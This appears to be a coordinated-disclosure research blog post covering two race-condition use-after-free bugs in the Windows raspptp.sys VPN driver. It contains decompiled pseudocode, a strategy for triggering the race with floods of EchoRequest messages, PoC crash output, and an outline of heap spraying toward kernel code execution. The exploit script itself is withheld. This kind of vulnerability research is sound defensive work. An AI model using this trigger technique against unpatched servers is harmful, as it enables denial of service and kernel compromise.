if...
    CtlDisconnectCall(lpCallToClean);
    CallpCancelCallTimers(lpCallToClean);
    DereferenceRefCount(lpCallToClean); // Decrement from Ctl loop
    lpCallToClean->CurIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallToClean->CtlCallSpinLock_A);
}
}

KeReleaseSpinLock(&lpCallToClean->CtlCallSpinLock_A, lpCallToClean->CurIRQL);
return DereferenceRefCount(lpCallToClean); // Freeing decrement

Here, a set of detach operations are performed to remove the call structure from the lists its stored in and appropriately decrease its internal reference count. A side effect of this detach phase is that the call context structure is removed from both the linked list and global array. This means that if one thread gets to far through processing a call context structure free before the other one retrieves it from the respective list, the race will already be lost. This further adds to the difficulty in getting these two sections of code lined up.

Ultimately the final call to DereferenceRefCount causes the release of the underlying memory which in our scenario it does by calling the call context structures internal free function pointer to the CallFree function. Before we go over what CallFree does, lets look at the other half of the race condition.

OutgoingCallReply Handling

lpCallOutgoingCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, ReasonCallIdMasked);
if ( lpCallOutgoingCallCtx )
{
    CallEventCallOutReply(lpCallOutgoingCallCtx, lpCtlPayloadBuffer);
}

The preceding excerpt of pseudo code is the bit of the OutgoingCallReply handling that we will be using to access the call context structures from a separate thread. Let’s take a look at the logic in this function which will also free the call context object!

lpCallCtx->CurIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallCtx->CtlCallSpinLock_A); 
... 
KeReleaseSpinLock(&lpCallCtx->CtlCallSpinLock_A, lpCallCtx->CurIRQL); 
if ( OutGoingCallReplyStatusCode ) { 
    CallSetState(lpCallCtx, 0xBu, v8, 0); CallCleanup(lpCallCtx);
}

This small code snippet from CallEventCallOutReply represents the code that is relevant for our PoC. Effectively if the status field of the OutgoingCallReply message is set then a call to CallCleanup happens and again will eventually result in CallFree being hit.

CallFree

The call free function releases resources for multiple sub objects stored in the call context as well as the call context itself:

void __fastcall CallFree(CtlCall *CallToBeFreed)
{
    CtlCall *lpCallToBeFreed;
    _NET_BUFFER_LIST *v2;
    NDIS_HANDLE v3;
    NDIS_HANDLE v4;
    PNDIS_HANDLE v5;
    PNDIS_HANDLE v6;
    PNDIS_HANDLE v7;

    if ( CallToBeFreed )
    {
        lpCallToBeFreed = CallToBeFreed;
         ...
         v2 = lpCallToBeFreed->CtlNetBufferList_A;
    if ( v2 )
         ChunkLChunkength(v2);
         v3 = lpCallToBeFreed->CtlCallWorkItemHandle_A;
    if ( v3 )
         NdisFreeIoWorkItem(v3);
         v4 = lpCallToBeFreed->CtlCallWorkItemHandle_B;
    if ( v4 )
        NdisFreeIoWorkItem(v4);
        v5 = lpCallToBeFreed->hCtlCallCloseTimeoutTimerObject;
    if ( v5 )
        NdisFreeTimerObject(v5);
        v6 = lpCallToBeFreed->hCtlCallAckTimeoutTimerObject;
    if ( v6 )
        NdisFreeTimerObject(v6);
        v7 = lpCallToBeFreed->hCtlDieTimeoutTimerObject;
    if ( v7 )
        NdisFreeTimerObject(v7);
        ExFreePoolWithTag(lpCallToBeFreed, 0);
    }
}

In CallFree, none of the sub-objects have their pointers Nulled out by raspptp.sys. This means that any one of these objects will cause potential double free conditions to occur, giving us a few different locations where we can expect a potential issue to occur when triggering the vulnerability.

Something that you may notice looking at the code snippets for this vulnerability is that there are large portions of overlapping locks. These will in effect cause each thread not to be able to enter certain sections of the cleanup and freeing process at the same time, which makes the race condition harder to predict. However, it does not prevent it from being possible.

We have knowingly not included many of the other hazards and caveats for triggering this vulnerability, as there are just too many different factors to go over, and in actuality a lot of them are self-correcting (luckily for us). The main reason we can ignore a lot of these hazards is that none of them truly stop the two threads from entering the vulnerable condition!

Proof of Concept

We will not yet be publishing our PoC for this vulnerability to allow time for patches to be fully adopted. This unfortunately makes it hard to show the exact process we took to trigger the vulnerability, but we will release the PoC script at a later date! For now here is a little sneak peak at the outputs:

[+] Race Condition Trigger Attempt: 1, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 2, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 3, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 4, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 5, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 6, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 7, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 8, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 9, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 10, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 11, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 12, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 13, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 14, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 15, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 16, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 17, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 18, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 19, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 20, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 21, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 22, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 23, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 24, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 25, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 26, With spacing 0 and sled 25
[****] The Server Has Crashed!

A Wild Crash Appeared!

The first step in PoC development is achieving a successful trigger of a vulnerability and usually for kernel vulnerabilities this means causing a crash! Here it is. A successful trigger of our race condition causing the target server to show us the iconic Blue Screen of Death (BSOD):

Now this crash has the following vulnerability check analysis and its pretty conclusive that we’ve caused one of the intended double free scenarios.

*******************************************************************************
* *
* Vulnerabilitycheck Analysis *
* *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa8875b31e820, Address of the trap frame for the exception that caused the vulnerabilitycheck
Arg3: ffffa8875b31e778, Address of the exception record for the exception that caused the vulnerabilitycheck
Arg4: 0000000000000000, Reserved

Devulnerabilityging Details:
------------------

KEY_VALUES_STRING: 1

Key : Analysis.CPU.mSec
Value: 5327

Key : Analysis.DevulnerabilityAnalysisManager
Value: Create

Key : Analysis.Elapsed.mSec
Value: 22625

Key : Analysis.Init.CPU.mSec
Value: 46452

Key : Analysis.Init.Elapsed.mSec
Value: 9300845

Key : Analysis.Memory.CommitPeak.Mb
Value: 82

Key : FailFast.Name
Value: CORRUPT_LIST_ENTRY

Key : FailFast.Type
Value: 3

Key : WER.OS.Branch
Value: fe_release

Key : WER.OS.Timestamp
Value: 2021-05-07T15:00:00Z

Key : WER.OS.Version
Value: 10.0.20348.1

VULNERABILITYCHECK_CODE: 139

VULNERABILITYCHECK_P1: 3

VULNERABILITYCHECK_P2: ffffa8875b31e820

VULNERABILITYCHECK_P3: ffffa8875b31e778

VULNERABILITYCHECK_P4: 0

TRAP_FRAME: ffffa8875b31e820 -- (.trap 0xffffa8875b31e820)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=0000000000000003
rdx=ffffcf88f1a78338 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8025f8d8ae1 rsp=ffffa8875b31e9b0 rbp=ffffcf88f1ae0602
r8=0000000000000010 r9=000000000000000b r10=fffff8025b0ddcb0
r11=0000000000000001 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
NDIS!ndisFreeNblToNPagedPool+0x91:
fffff802`5f8d8ae1 cd29 int 29h
Resetting default scope

EXCEPTION_RECORD: ffffa8875b31e778 -- (.exr 0xffffa8875b31e778)
ExceptionAddress: fffff8025f8d8ae1 (NDIS!ndisFreeNblToNPagedPool+0x0000000000000091)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000003
Subcode: 0x3 FAST_FAIL_CORRUPT_LIST_ENTRY

PROCESS_NAME: System

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE_STR: c0000409

EXCEPTION_PARAMETER1: 0000000000000003

EXCEPTION_STR: 0xc0000409

STACK_TEXT:
ffffa887`5b31dcf8 fffff802`5b354ea2 : ffffa887`5b31de60 fffff802`5b17bb30 ffff9200`174e5180 00000000`00000000 : nt!DbgBreakPointWithStatus
ffffa887`5b31dd00 fffff802`5b3546ed : ffff9200`00000003 ffffa887`5b31de60 fffff802`5b22c910 00000000`00000139 : nt!KiVulnerabilityCheckDevulnerabilityBreak+0x12
ffffa887`5b31dd60 fffff802`5b217307 : ffffa887`5b31e4e0 ffff9200`1732a180 ffffcf88`ef584700 fffffff6`00000004 : nt!KeVulnerabilityCheck2+0xa7d
ffffa887`5b31e4c0 fffff802`5b229d69 : 00000000`00000139 00000000`00000003 ffffa887`5b31e820 ffffa887`5b31e778 : nt!KeVulnerabilityCheckEx+0x107
ffffa887`5b31e500 fffff802`5b22a1b2 : 00000000`00000000 fffff802`5f5a1285 ffffcf88`edd5c210 fffff802`5b041637 : nt!KiVulnerabilityCheckDispatch+0x69
ffffa887`5b31e640 fffff802`5b228492 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiFastFailDispatch+0xb2
ffffa887`5b31e820 fffff802`5f8d8ae1 : ffffcf88`ef584c00 ffffcf88`ef584700 00000000`00000000 00000000`00000000 : nt!KiRaiseSecurityCheckFailure+0x312
ffffa887`5b31e9b0 fffff802`5f8d5d3d : ffffcf88`f1a78350 00000000`00000000 ffffcf88`f1ae06b8 01000000`000002d0 : NDIS!ndisFreeNblToNPagedPool+0x91
ffffa887`5b31e9e0 fffff802`62bd2f7d : ffffcf88`f1ae06b8 fffff802`62bda000 ffffcf88`f1a78050 ffffcf88`f202dd70 : NDIS!NdisFreeNetBufferList+0x11d
ffffa887`5b31ea20 fffff802`62bd323f : ffffcf88`f202dd70 ffffcf88`ef57f1a0 ffffcf88`ef1fc7e8 ffffcf88`f1ae0698 : raspptp!CallFree+0x65
ffffa887`5b31ea50 fffff802`62bd348e : ffffcf88`f1a78050 00000000`00040246 ffffa887`5b31eaa0 00000000`00000018 : raspptp!CallpFinalDerefEx+0x7f
ffffa887`5b31ea80 fffff802`62bd2bad : ffffcf88`f1ae06b8 ffffcf88`f1a78050 00000000`0000000b ffffcf88`f1a78050 : raspptp!DereferenceRefCount+0x1a
ffffa887`5b31eab0 fffff802`62be37b2 : ffffcf88`f1ae0660 ffffcf88`f1ae0698 ffffcf88`f1ae06b8 ffffcf88`f1a78050 : raspptp!CallCleanup+0x61d
ffffa887`5b31eb00 fffff802`62bd72bd : ffffcf88`00000000 ffffcf88`f15ce810 00000000`00000080 fffff802`62bd7290 : raspptp!CtlpCleanup+0x112
ffffa887`5b31eb90 fffff802`5b143425 : ffffcf88`ef586040 fffff802`62bd7290 00000000`00000000 00000000`00000000 : raspptp!MainPassiveLevelThread+0x2d
ffffa887`5b31ebf0 fffff802`5b21b2a8 : ffff9200`1732a180 ffffcf88`ef586040 fffff802`5b1433d0 00000000`00000000 : nt!PspSystemThreadStartup+0x55
ffffa887`5b31ec40 00000000`00000000 : ffffa887`5b31f000 ffffa887`5b319000 00000000`00000000 00000000`00000000 : nt!KiStartSystemThread+0x28

SYMBOL_NAME: raspptp!CallFree+65

MODULE_NAME: raspptp

IMAGE_NAME: raspptp.sys

STACK_COMMAND: .thread ; .cxr ; kb

BUCKET_ID_FUNC_OFFSET: 65

FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_raspptp!CallFree

OS_VERSION: 10.0.20348.1

BUILDLAB_STR: fe_release

OSPLATFORM_TYPE: x64

OSNAME: Windows 10

FAILURE_ID_HASH: {5d4f996e-8239-e9e8-d111-fdac16b209be}

Followup: MachineOwner
---------

It turns out that the double free trigger here is triggering a kernel assertion to be raised on a linked list. The cause of this is one of those sub objects on the call context structure we mentioned earlier. Now, while crashes are great for PoC’s they are not great for exploits, so what do we need to do next if we want to look at further exploitation more seriously?

Exploitation – Next Steps

The main way in which this particular double free scenario can be exploited would be to attempt to spray objects into the kernel heap that will instead be incorrectly freed by our second free instead of causing the above kernel vulnerability check.

The first object that might make a good contender is the call context structure itself. If we were to spray a new call context into the freed memory between the two frees being run then we would have a freed call context structure still connected to a valid and accessible control connection. This new call context structure would be comprised of mostly freed sections of memory that can then be used to cause further memory corruption and potentially achieve kernel RCE against a target server!

Conclusion

Race conditions are a particularly tricky set of vulnerabilities, especially when it comes to getting reliable exploitation. In this scenario we have a remarkably small windows of opportunity to do something potentially dangerous. Exploit development, however, is the art of taking advantage of small opportunities. Achieving RCE with this vulnerability might seem like an unlikely event but it is certainly possible! RCE is also not the only use of this vulnerability with local access to a target machine; it doubles as an opportunity for Local Privilege Escalation (LPE). All this makes CVE-2022-23270 something that in the right hands could be very dangerous.

Timeline

  • Vulnerability Reported To Microsoft – 29 October 2021
  • Vulnerability Acknowledged – 29 October 2021
  • Vulnerability Confirmed – 11 November 2021
  • Patch Release Date Confirmed – 12 January 2022
  • Patch Release – 10 May 2022

The post CVE-2022-23270 – Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2) appeared first on Nettitude Labs.

CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1)

10 May 2022 at 09:00

CVE-2022-21972 is a Windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering the raspptp.sys kernel driver. The vulnerability is a race condition issue and can be reliably triggered through sending crafted input to a vulnerable server. The vulnerability can be be used to corrupt memory and could be used to gain kernel Remote Code Execution (RCE) or Local Privilege Escalation (LPE) on a target system.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected Windows versions check the official disclosure post on MSRC:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21972

The vulnerable code is present on both server and desktop distributions, however due to configuration differences, only the server deployment is exploitable.

Overview

This vulnerability is based heavily on how socket object life cycles are managed by the raspptp.sys driver. In order to understand the vulnerability we must first understand some of the basics in the kernel driver interacts with sockets to implement network functionality.

Sockets In The Windows Kernel – Winsock Kernel (WSK)

WSK is the name of the Windows socket API that can be used by drivers to create and use sockets directly from the kernel. Head over to https://docs.microsoft.com/en-us/windows-hardware/drivers/network/winsock-kernel-overview to see an overview of the system.

The way in which the WSK API is usually used is through a set of event driven call back functions. Effectively, once a socket is set up, an application can provide a dispatch table containing a set of function pointers to be called for socket related events. In order for an application to be able to maintain its own state through these callbacks, a context structure is also provided by the driver to be given to each callback so that state can be tracked for the connection throughout its life-cycle.

raspptp.sys and WSK

Now that we understand the basics of how sockets are interacted with in the kernel, let’s look at how the raspptp.sys driver uses WSK to implement the PPTP protocol.

The PPTP protocol specifies two socket connections; a TCP socket used for managing a VPN connection and a GRE (Generic Routing Encapsulation) socket used for sending and receiving the VPN network data. The TCP socket is the only one we care about for triggering this issue, so lets break down the life cycle of how raspptp.sys handles these connections with WSK

  1. A new listening socket is created by the WskOpenSocket function in raspptp.sys.  This function is passed a WSK_CLIENT_LISTEN_DISPATCH dispatch table with the WskConnAcceptEvent function specified as the WskAcceptEven handler. This is the callback that handles a socket accept event, aka new incoming connection.
  2. When a new client connects to the server the WskConnAcceptEvent function is called.  This function allocates a new context structure for the new client socket and registers a WSK_CLIENT_CONNECTION_DISPATCH dispatch table with all event callback functions specified. These are WskConnReceiveEvent, WskConnDisconnectEvent and WskConnSendBacklogEvent for receive, disconnect and send events respectively.
  3. Once the accept event is fully resolved, WskAcceptCompletion is called and a callback is triggered (CtlConnectQueryCallback) which completes initialisation of the PPTP Control connection and creates a context structure specifically for tracking the state of the clients PPTP control connection. This is the main object which we care about for this vulnerability.

The PPTP Control connection context structure is allocated by the CtlAlloc function. Some abbreviated pseudo code for this function is:

PptpCtlCtx *__fastcall CtlAlloc(PptpAdapterContext *AdapterCtx)
{
    PptpAdapterContext *lpPptpAdapterCtx;
    PptpCtlCtx *PptpCtlCtx;
    PptpCtlCtx *lpPptpCtlCtx;
    NDIS_HANDLE lpNDISMiniportHandle;
    PDEVICE_OBJECT v6;
    __int64 v7;
    NDIS_HANDLE lpNDISMiniportHandle_1;
    NDIS_HANDLE lpNDISMiniportHandle_2;
    struct _NDIS_TIMER_CHARACTERISTICS TimerCharacteristics;

    lpPptpAdapterCtx = AdapterCtx;
    PptpCtlCtx = (PptpCtlCtx *)MyMemAlloc(0x290ui64, 'TPTP'); // Actual name of the allocator function in the raspptp.sys code
    lpPptpCtlCtx = PptpCtlCtx;
    if ( PptpCtlCtx )
    {
        memset(PptpCtlCtx, 0, 0x290ui64);
        ReferenceAdapter(lpPptpAdapterCtx);
        lpPptpCtlCtx->AllocTagPTPT = 'TPTP';
        lpPptpCtlCtx->CtlMessageTypeToLength = (unsigned int *)&PptpCtlMessageTypeToSizeArray;
        lpPptpCtlCtx->pPptpAdapterCtx = lpPptpAdapterCtx;
        KeInitializeSpinLock(&lpPptpCtlCtx->CtlSpinLock);
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Blink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Blink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Flink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Flink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Blink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Flink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpNDISMiniportHandle = lpPptpAdapterCtx->MiniportNdisHandle;
        TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpEchoTimeout;
        *(_DWORD *)&TimerCharacteristics.Header.Type = 0x180197;
        TimerCharacteristics.AllocationTag = 'TMTP';
        TimerCharacteristics.FunctionContext = lpPptpCtlCtx;
        if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlEchoTimeoutNdisTimerHandle) )
        {
        ...
        }
        else
        {
            lpNDISMiniportHandle_1 = lpPptpAdapterCtx->MiniportNdisHandle;
            TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
            if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle_1,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )
            {
                ...
            }
            else
            {
                lpNDISMiniportHandle_2 = lpPptpAdapterCtx->MiniportNdisHandle;
                TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpStopTimeout;
                if ( !NdisAllocateTimerObject(
                lpNDISMiniportHandle_2,
                &TimerCharacteristics,
                &lpPptpCtlCtx->CtlStopTimeoutNdisTimerHandle) )
                {
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutTriggered, NotificationEvent, 1u);
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutCancled, NotificationEvent, 1u);
                    lpPptpCtlCtx->CtlCtxReferenceCount = 1;// Set reference count to an initial value of one
                    lpPptpCtlCtx->fpCtlCtxFreeFn = (__int64)CtlFree;
                    ExInterlockedInsertTailList(
                    (PLIST_ENTRY)&lpPptpAdapterCtx->PptpWanEndpointsFlink,
                    &lpPptpCtlCtx->CtlPptpWanEndpointsEntry,
                    &lpPptpAdapterCtx->PptpAdapterSpinLock);
                    return lpPptpCtlCtx;
                }
                ...
            }
        }
        ...
    }
    if...
        return 0i64;
}

The important parts of this structure to note are the CtlCtxReferenceCount and CtlWaitTimeoutNdisTimerHandle structure members. This new context structure is stored on the socket context for the new client socket and can then be referenced for all of the events relating to the socket it binds to.

The only section of the socket context structure that we then care about are the following fields:

00000008 ContextPtr dq ? ; PptpCtlCtx
00000010 ContextRecvCallback dq ? ; CtlReceiveCallback
00000018 ContextDisconnectCallback dq ? ; CtlDisconnectCallback
00000020 ContextConnectQueryCallback dq ? ; CtlConnectQueryCallback
  • PptpCtlCtx – The PPTP specific context structure for the control connection.
  • CtlReceiveCallback – The PPTP control connection receive callback.
  • CtlDisconnectCallback – The PPTP control connection disconnect callback.
  • CtlConnectQueryCallback – The PPTP control connection query (used to get client information on a new connection being complete) callback.

raspptp.sys Object Life Cycles

The final bit of background information we need to understand before we delve into the vulnerability is the way that raspptp keeps these context structures alive for a given socket. In the case of the PptpCtlCtx structure, both the client socket and the PptpCtlCtx structure have a reference count.

This reference count is intended to be incremented every time a reference to either object is created. These are initially set to 1 and when decremented to 0 the objects are freed by calling a free callback stored within each structure. This obviously only works if the code remembers to increment and decrement the reference counts properly and correctly lock access across multiple threads when handling the respective structures.

Within raspptp.sys, the code that performs the reference increment and de-increment functionality usually looks like this:

// Increment code
_InterlockedIncrement(&Ctx->ReferenceCount);

// Decrement Code
if ( _InterlockedExchangeAdd(&Ctx->ReferenceCount, 0xFFFFFFFF) == 1 )
    ((void (__fastcall *)(CtxType *))Ctx->fpFreeHandler)(Ctx);

As you may have guessed at this point, the vulnerability we’re looking at is indeed due to incorrect handling of these reference counts and their respective locks, so now that we have covered the background stuff let’s jump into the juicy details!

The Vulnerability

The first part of our use after free vulnerability is in the code that handles receiving PPTP control data for a client connection. When new data is received by raspptp.sys the WSK layer will dispatch a call the the appropriate event callback. raspptp.sys registers a generic callback for all sockets called ReceiveData. This function parses the incoming data structures from WSK and forwards on the incoming data to the client sockets contexts own receive data call back. For a PPTP control connection, this callback is the CtlReceiveCallback function.

The section of the ReceiveData function that calls this callback has the following pseudo code. This snippet includes all the locking and reference increments that are used to protect the code against multi threaded access issues…

_InterlockedIncrement(&ClientCtx->ConnectionContextRefernceCount);
((void (__fastcall *)(PptpCtlCtx *, PptpCtlInputBufferCtx *, _NET_BUFFER_LIST *))ClientCtx->ContextRecvCallback)(
ClientCtx->ContextPtr,
lpCtlBufferCtx,
NdisNetBuffer);

the CtlReceiveCallback function has the following pseudo code:

__int64 __fastcall CtlReceiveCallback(PptpCtlCtx *PptpCtlCtx, PptpCtlInputBufferCtx *PptpBufferCtx, _NET_BUFFER_LIST *InputBufferList)
{
    PptpCtlCtx *lpPptpCtlCx;
    PNET_BUFFER lpInputFirstNetBuffer;
    _NET_BUFFER_LIST *lpInputBufferList;
    ULONG NetBufferLength;
    PVOID NetDataBuffer;

    lpPptpCtlCx = PptpCtlCtx;
    lpInputFirstNetBuffer = InputBufferList->FirstNetBuffer;
    lpInputBufferList = InputBufferList;
    NetBufferLength = lpInputFirstNetBuffer->DataLength;
    NetDataBuffer = NdisGetDataBuffer(lpInputFirstNetBuffer, lpInputFirstNetBuffer->DataLength, 0i64, 1u, 0);
    if ( NetDataBuffer )
        CtlpEngine(lpPptpCtlCx, (uchar *)NetDataBuffer, NetBufferLength);
        ReceiveDataComplete(lpPptpCtlCx->CtlWskClientSocketCtx, lpInputBufferList);
        return 0i64;
}

The CtlpEngine function is the state machine responsible for parsing the incoming PPTP control data. Now there is one very important piece of code that is missing from these two sections and that is any form of reference count increment or locking for the PptpCtlCtx object!

Neither of the callback handlers actually increment the reference count for the PptpCtlCtx or attempt to lock access to signify that it is in use; this is potentially a vulnerability because if at any point the reference count was to be decremented then the object would be freed! However, if this is so bad, why isnt every PPTP server just crashing all the time? The answer to this question is that the CtlpEngine function actually uses the reference count correctly.

This is where things get confusing. Assuming that the raspptp.sys driver was completely single threaded, this implementation would be 100% safe as no part of the receive pipeline for the control connection decrements the object reference count without first performing an increment to account for it. In reality however, raspptp.sys is not a single threaded driver. Looking back at the initialization of the PptpCtlCtx object, there is one part of particular interest.

TimerCharacteristics.FunctionContext = PptpCtlCtx;
TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
if ( NdisAllocateTimerObject(
    lpNDISMiniportHandle_1,
    &TimerCharacteristics,
    &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )

Here we can see the allocation of an Ndis timer object. The actual implementation of these timers isn’t important, but what is important is that these timers dispatch there callbacks on a separate thread to that of which WSK dispatches the ReceiveData callback. Another interesting point is that both use the PptpCtlCtx structure as their context structure.

So what does this timer callback do and when does it happen? The code that sets the timer is as follows:

NdisSetTimerObject(newClientCtlCtx->CtlWaitTimeoutNdisTimerHandle, (LARGE_INTEGER)-300000000i64, 0, 0i64);// 30 second timeout timer

We can see that a 30 second timer trigger is set and when this 30 seconds is up, the CtlpWaitTimeout callback is called. This 30 second timer can be canceled but this is only done when a client performs a PPTP control handshake with the server, so assuming we never send a valid handshake after 30 seconds the callback will be dispatched. But what does this do?

The CtlpWaitTimeout function is used to handle the timer callback and it has the following pseudo code:

LONG __fastcall CtlpWaitTimeout(PVOID Handle, PptpCtlCtx *Context)
{
    PptpCtlCtx *lpCtlTimeoutEvent;

    lpCtlTimeoutEvent = Context;
    CtlpDeathTimeout(Context);
    return KeSetEvent(&lpCtlTimeoutEvent->CtlWaitTimeoutTriggered, 0, 0);
}

As we can see the function mainly serves to call the eerily named CtlpDeathTimeout function, which has the following pseudo code:

void __fastcall CtlpDeathTimeout(PptpCtlCtx *CtlCtx)
{
    PptpCtlCtx *lpCtlCtx;
    __int64 Unkown;
    CHAR *v3;
    char SockAddrString;

    lpCtlCtx = CtlCtx;
    memset(&SockAddrString, 0, 65ui64);
    if...
        CtlSetState(lpCtlCtx, CtlStateUnknown, Unkown, 0);
        CtlCleanup(lpCtlCtx, 0);
}

This is where things get even more interesting. The CtlCleanup function is the function responsible for starting the process of tearing down the PPTP control connection. This is done in two steps. First, the state of the Control connection is set to CtlStateUnknown which means that the CtlpEngine function will be prevented from processing any further control connection data (kind of). The second step is to push a task to run the similarly named CtlpCleanup function onto a background worker thread which belongs to the raspptp.sys driver.

The end of the CtlpCleanup function contains the following code that will be very useful for us being able to trigger a use after free as it will always run on a different thread to the CtlpEngine function.

result = (unsigned int)_InterlockedExchangeAdd(&lpCtlCtxToCleanup->CtlCtxReferenceCount, 0xFFFFFFFF);
if ( (_DWORD)result == 1 )
    result = ((__int64 (__fastcall *)(PptpCtlCtx *))lpCtlCtxToCleanup->fpCtlCtxFreeFn)(lpCtlCtxToCleanup);

It decrements the reference count on the PptpCtlCtx object and even better is that no part of this timeout pipeline increments the reference count in a way that would prevent the free function from being called!

So, theoretically, all we need to do is find some way of getting the CtlpCleanup and CtlpEngine function to run at the same time on seperate threads and we will be able to cause a Use after Free!

However, before we celebrate too early, we should take a look at the function that actually frees the PptpCtlCtx function because it is yet another callback. The fpCtlCtxFreeFn property is a callback function pointer to the CtlFree function. This function does a decent amount of tear down as well but the bits we care about are the following lines

WskCloseSocketContextAndFreeSocket(CtlWskContext);/
lpCtlCtxToFree->CtlWskClientSocketCtx = 0i64;
...
ExFreePoolWithTag(lpCtlCtxToFree, 0);

Now there is more added complication in this code that is going to make things a little more difficult. The call to WskCloseSocketContextAndFreeSocket actually closes the client socket before freeing the PptpCtlCtx structure. This means that at the point the PptpCtlCtx structure is freed, we will no longer be able to send new data to the socket and trigger any more calls into CtlpEngine. However, this doesn’t mean that we can’t trigger the vulnerability, since if data is already being processed by CtlpEngine when the socket is closed we simply need to hope the thread stays in the function long enough for the free to occur in CtlFree and boom – we have a UAF.

Now that we have a good old fashioned kernel race condition, let’s take a look at how we can try to trigger it!

The Race Condition

Like any good race condition, this one contains a lot of moving parts and added complication which make triggering it a non trivial task, but it’s still possible! Let’s take a look at what we need to happen.

  1. 30 second timeout is triggered and eventually runs CtlCleanup, pushing a CtlpCleanup task onto a background worker thread queue.
  2. Background worker thread wakes up and starts processing the CtlpCleanup task from its task queue.
  3. CtlpEngine starts or is currently processing data on a WSK dispatch thread when the CtlpCleanup function frees the underlying PptpCtlCtx structure from the worker thread!
  4. Bad things happen…

Triggering the Race Condition

The main parts of this race condition to consider are what are the limits on the data can we send to the server to spend as much time as possible in CtlpEngine parsing loop and can we do this without cancelling the timeout?

Thankfully as previously mentioned the only way to cancel the timeout is to perform a PPTP control connection handshake, which technically means we can get the CtlpEngine function to process any other part of the control connection, as long as we don’t start the handshake. However the state machine within CtlpEngine needs the handshake to take place to enable any other part of the control connection!

There is one part of the CtlpEngine state machine that can still be partially validly hit (without triggering an error) before the handshake has taken place. This is the EchoRequest control message type. Now we can’t actually enter the proper handling of the message type before the handshake has taken place but what we can do is use it to iterate through all the sent data in the parsing loop without triggering a parsing error. This effectively forms a way of us spinning inside the CtlpEngine function without cancelling the timeout which is exactly what we want. Even better is that this remains true when the CtlStateUnknown state is set by the CtlCleanup function.

Unfortunately the maximum amount of data we can process in one WSK receive data event callback trigger is limited to the maximum data that can be received in one TCP packet. In theory this is 65,535 bytes but due to the size limitation of Ethernet frames to 1,500 bytes we can only send ~1,450 bytes (1,500 minus the headers of the other network layer frames) of PPTP control messages in a single request. This works out at around 90 EchoRequest messages per callback event trigger. For a modern CPU this is not a lot to churn through before hopping out of the CtlpEngine function.

